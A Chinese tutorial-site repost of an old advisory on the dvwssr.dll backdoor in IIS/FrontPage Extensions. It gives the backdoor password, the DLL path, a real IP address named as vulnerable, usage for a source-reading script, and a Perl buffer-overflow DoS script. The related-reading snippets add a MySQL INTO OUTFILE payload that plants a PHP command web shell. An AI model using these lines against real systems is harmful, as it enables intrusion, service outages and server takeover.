微软dvwssr.dll后门

2016-01-29 17:54 4 1 收藏

微软dvwssr.dll后门,微软dvwssr.dll后门

【 tulaoshi.com - ASP 】

  涉及程序:
MS IIS server/Frontpage Ext Server
描述
微软开发的两个动态库存在后门允许用户查看ASP文件源程序和下载整个网站
详细
随IIS和Frontpage Extention server而来的动态库程序,存在后门,允许用户远程读取
asp、asa和CGI程序的源代码。但这个动态库要求有密码,这个后门的密码是: "Netsc
ape engineers are weenies!"
程序路径为: /_vti_bin/_vti_aut/dvwssr.dll
一般安装了 Frontpage98的 IIS服务器都有这个路径和文件。
这个程序要求解码后才能发挥读取asp等源程序的功能,有趣的是,这个密码正是嘲弄其
竞争对手Netscape的。
我们提供一个有该漏洞的国外网站给安全技术人员参考:
http://62.236.90.195
其网站上有一个ASP程序 : http://62.236.90.195/cqsdoc/showcode.asp
关于读取源程序,请下载这个测试程序,用法为:
[john@Linux john]$ ./dvwssr1.pl 62.236.90.195 /cqsdoc/showcode.asp
国内有很多网站都有这个漏洞,请管理员尽快更正!
另外, dvwssr.dll还存在缓冲溢出,容易被DOS攻击,对于这个缓冲溢出的漏洞,可能能
利用远程执行指令,但目前没有可用的exploit出来。
有一个DOS的脚本:
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1nHost: yourhostnn";
另注:对该漏洞的说法,发现者、bugtraq和微软都有不同的版本
微软不认为这是后门,但有咬文嚼字之嫌。
参见:
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp
这个漏洞的实质是一个字符串,就是我们前面提到的 "Netscape engineers are weeni
es!"
只要知道这个字符串,和了解相关的算法,就可以获得ASP等程序的源码。
我们已经做了大量测试,证实的确有效。
解决方案
删除 dvwssr.dll
安装 Office 2000 Server Exten 

来源:https://www.tulaoshi.com/n/20160129/1503478.html

延伸阅读
孩子换牙后门牙有缝怎么办  从宝宝萌出第一颗乳牙开始,爸妈在育儿当中就要对宝宝的口腔问题重视起来,但在宝宝换牙的时候难免遇到这样那样的问题,有不少家长在咨询孩子门牙有缝怎么办?是什么原因导致孩子的门牙处有缝隙?这会给宝宝的健康带来怎样的影响? 儿童长到6岁左右,乳牙会相继脱落,逐渐被恒牙所代替,直到12岁左右,恒...
标签: 电脑入门
问:今天开电脑的时侯,一旦启动某个应用程序,总是弹出没有找到comres.dll,因此这个应用程序未能启动。重新安装应用程序可能会修复此问题。 comres.dll是什么?如果出现这样的情况怎么办?comres.dll文件能修复么?网络上面曾经出现过comres.dll病毒,comres.dll和病毒有关联么?请教各位大虾怎样才能解决这个问题呢?我的系统是 Windows XP Pro...
不设后门的装修风水:根据选地准则,大小住宅没有后门不能居住,夫妻任河一方有先亡之虞。 通常住宅有前门也有后门,如果单只开前门没设后门,在安全与通风两种理由上讲,实在不适宜居住。 在最重要的安全问题上讲,万一发生火灾便无法逃出。古代有刺客,若没设后门便逃生无路,所以住宅最基湘勺条件便是要有前、后...
标签: MySQL mysql数据库
  通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php' 通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容...
标签: PHP
     要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。 我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的...

经验教程

313

收藏

19

精华推荐

微软Fetch!怎么玩

微软Fetch!怎么玩

成文在方

用Delphi制作DLL小结

用Delphi制作DLL小结

不吸水的纸824

在DLL中使用资源

在DLL中使用资源

男孩和女孩之歌

热门标签

微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部